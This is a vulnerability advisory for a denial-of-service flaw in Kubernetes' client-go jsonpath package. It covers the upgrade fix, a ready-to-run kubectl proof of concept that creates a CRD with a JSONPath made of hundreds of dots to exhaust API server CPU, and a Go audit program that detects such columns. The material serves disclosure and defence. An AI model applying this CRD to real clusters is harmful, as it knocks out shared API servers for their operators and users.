Snyk has a proof-of-concept or detailed explanation of how to exploit this vulnerability.
Upgrade k8s.io/kubernetes/staging/src/k8s.io/client-go/util/jsonpath to version 1.19.0-rc.4 or higher.
k8s.io/kubernetes/staging/src/k8s.io/client-go/util/jsonpath is a template engine using jsonpath syntax, which is described at http://goessner.net/articles/JsonPath/. In addition, it has a {range} {end} function to iterate over lists and slices.
Affected versions of this package are vulnerable to Denial of Service (DoS). A user able to create CRDs could create a malicious CRD such that listing CRs will cause enormous amounts of CPU usage on the API server.
kubectl create -f - <<EOF
apiVersion: apiextensions.k8s.io/v1beta1
kind: CustomResourceDefinition
metadata:
  name: foos.example.com
spec:
  group: example.com
  scope: Namespaced
  names:
    plural: foos
    singular: foo
    kind: Foo
  version: v1
  additionalPrinterColumns:
  - name: FOO
    type: string
    JSONPath: ........................................................................................................................................................................................................
EOF
kubectl create -f - <<EOF
apiVersion: example.com/v1
kind: Foo
metadata:
  name: foo-cr
spec:
  foo:
    bar:
      baz:
        qux: data
EOF
kubectl get foo
The API server CPU usage significantly increases.
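A defensive audit for the pattern in the proof of concept above, added here as an example and not code from Kubernetes or Snyk: it reads the JSON produced by `kubectl get crd -o json` and lists printer columns whose JSONPath contains more than two consecutive dots. The function name, the threshold of two (the longest run in an ordinary expression is the `..` recursive-descent operator) and the shortened sample input are assumptions.

```go
package main

import (
	"encoding/json"
	"fmt"
	"strings"
)

// Constructed sample (not real cluster output): the page's CRD as JSON, dot run shortened.
const sampleCRDList = `{"items":[{"metadata":{"name":"foos.example.com"},"spec":{"additionalPrinterColumns":[
 {"name":"FOO","type":"string","JSONPath":"........"},{"name":"AGE","type":"date","JSONPath":".metadata.creationTimestamp"}]}}]}`
type column struct {
	Name     string `json:"name"`
	JSONPath string `json:"jsonPath"` // keys match case-insensitively, so v1beta1 "JSONPath" fits too
}
type crd struct {
	Metadata struct{ Name string `json:"name"` } `json:"metadata"`
	Spec     struct {
		Columns  []column `json:"additionalPrinterColumns"` // v1beta1 location
		Versions []struct {
			Columns []column `json:"additionalPrinterColumns"` // v1 per-version location
		} `json:"versions"`
	} `json:"spec"`
}

// SuspiciousColumns lists "crd/column" for columns with more than limit consecutive dots (assumed heuristic).
func SuspiciousColumns(crdListJSON []byte, limit int) ([]string, error) {
	var list struct{ Items []crd `json:"items"` }
	if err := json.Unmarshal(crdListJSON, &list); err != nil {
		return nil, err
	}
	var hits []string
	for _, c := range list.Items {
		cols := c.Spec.Columns
		for _, v := range c.Spec.Versions {
			cols = append(cols, v.Columns...)
		}
		for _, col := range cols {
			if strings.Contains(col.JSONPath, strings.Repeat(".", limit+1)) {
				hits = append(hits, c.Metadata.Name+"/"+col.Name)
			}
		}
	}
	return hits, nil
}

func main() {
	fmt.Println(SuspiciousColumns([]byte(sampleCRDList), 2))
}
```

A hit is a reason to review who created the CRD and to confirm the API server runs a release containing the fixed jsonpath package.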